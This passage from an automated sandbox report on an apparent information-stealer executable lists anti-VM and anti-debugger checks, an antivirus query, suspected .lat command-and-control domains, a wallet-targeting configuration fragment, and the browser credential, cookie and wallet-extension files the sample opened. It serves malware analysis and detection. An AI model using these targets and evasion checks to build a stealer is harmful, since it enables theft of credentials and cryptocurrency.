                Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: TmmiCE5Ulm.exe, 00000000.00000002.2686849937.00000000008C9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2253010841.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2270285574.0000000001149000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2334313230.0000000001149000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2687870915.0000000001149000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2231964807.0000000001154000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
                Source: TmmiCE5Ulm.exe, 00000000.00000002.2686849937.00000000008C9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: SICE
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sweepyribs.lat
                Source: TmmiCE5Ulm.exe, 00000000.00000002.2687094452.0000000000910000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: TmmiCE5Ulm.exe, TmmiCE5Ulm.exe, 00000000.00000003.2270285574.0000000001143000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2253010841.0000000001184000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2253010841.0000000001143000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2253010841.000000000112B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2270285574.0000000001128000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2253137538.000000000119F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: TmmiCE5Ulm.exe PID: 5600, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2253010841.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2253010841.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2231964807.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
                Source: TmmiCE5Ulm.exeString found in binary or memory: "app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"
                Source: TmmiCE5Ulm.exeString found in binary or memory: "app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2253010841.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"]`=
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2253010841.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"]`=
                Source: TmmiCE5Ulm.exeString found in binary or memory: Wallets/Ethereum
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2228599565.000000000118B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2253010841.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"]`=
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
